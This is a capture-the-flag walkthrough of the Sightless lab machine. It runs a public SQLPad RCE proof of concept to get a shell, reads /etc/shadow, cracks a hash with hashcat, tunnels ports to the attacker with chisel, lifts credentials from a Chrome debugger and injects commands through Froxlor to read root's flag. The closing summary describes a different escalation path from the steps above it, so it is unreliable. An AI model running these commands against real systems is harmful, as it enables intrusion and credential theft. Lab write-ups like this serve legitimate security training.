Reconnaissance & Enumeration#
- Network scan reveals three open ports
- Which are
FTP,SSH,http(80). Port21(FTP)is very unusual here.
- Initial Enumeration reveals that the page uses
nginx/1.18.0 - Port
80had a Slightless Titled page, while scrolling through I found a button which redirected tosqlpad.sightless.htb. It’s a different domain so I quickly added it to my hosts file and visited it. - Found a RCE vulnerability from google search: POC
CVE-2022-0944 Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.
Exploitation#
- First I cloned this repo and then I installed all required packages.
pip3 install -r requirements.txt
- Then I execurted the POC and eventually got the shell
python3 main.py http://sqlpad.sightless.htb/ 10.10.14.12 6001
- There was a sqlite file in the current working directory but, there wasn’t any way to transfer it to our machine cause no versions of python found om the system.
- Then I got to know that this is a docker image.
- Cause it is weird to have this directory here.
- Anyway from
/etc/passwdI got know about the two users with bash permissions
- From shadow I got the hash of user michael for cracking. Ignore the root hash i am pretty sure it would be a waste of time.
- After finding the module, I cracked it with my goto tool
hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
- then I logged in via SSH
- GotUser flag
Privilege Escalation#
- While doing post-enumeration I found some interesting local ports using
ss -tunlp - Too many ports don’t ya think. Kinda sus if you ask me
- So I decided to forward all the weird looking ports to my machine
- On my machine
chisel server -p 7001 --reverse
- On the target machine
./chisel client 10.10.14.12:7001 R:3306:localhost:3306 R:44771:localhost:44771 R:8080:localhost:8080 R:43047:localhost:43047 R:41049:localhost:41049 R:3000:localhost:3000 R:33060:localhost:33060
- Not gonna lie that’s a lot of ports
- It seems that port
8080is runningFroxlor, which required credentials to loginWhat is Froxlor
The server administration software for your needs. Developed by experienced server administrators, this panel simplifies the effort of managing your hosting platform.
- All the remaining ports seems to be suspicious cause most are non-http ones
- Some of the ports are using chrome debugger internally to do some tasks.
- So I opened chrome and navigated to
chrome://inspect/#devicesand added all the forwarded ports using configure.
- Got some hits. I clicked inspect and saw it automatically logging into Froxlor with credentials.
- From the Network tab, I auth request I saw the credentials in plaintext.
- Used those creds and got into Froxlor
- While hanging around, I discovered an potential endpoint that could lead to command injection
- Created a New PHP version from PHP-FPM versions
- In the php-fpm restart command I filled it with
cp /root/root.txt /home - Then went to settings and then restarted the php-fpm
- After 3-5 min I got the file in the home directory but we need permissions so again using the same method I modified the command to
chmod 777 /home/root.txtThis will change permissions.
- Got theUser flagThen I realized that from the start I should’ve changed permissions for root directory itself
Summary#
The Sightless machine is an easy-difficulty Linux machine. The walkthrough details the process of exploiting several vulnerabilities to gain root access.
Initial Foothold: The website uses an SQLPad instance vulnerable to template injection (CVE-2022-0944), which is 1 used to gain access to a Docker container.
SSH Access: The /etc/shadow file is found within the Docker container, revealing a password hash. Cracking this hash provides SSH access to the host machine.
Privilege Escalation: A Froxlor instance vulnerable to Blind XSS (CVE-2024-34070) is exploited to gain access to the FTP service. This FTP service contains a KeePass database. Accessing this database reveals the root SSH keys, granting a privileged shell on the host
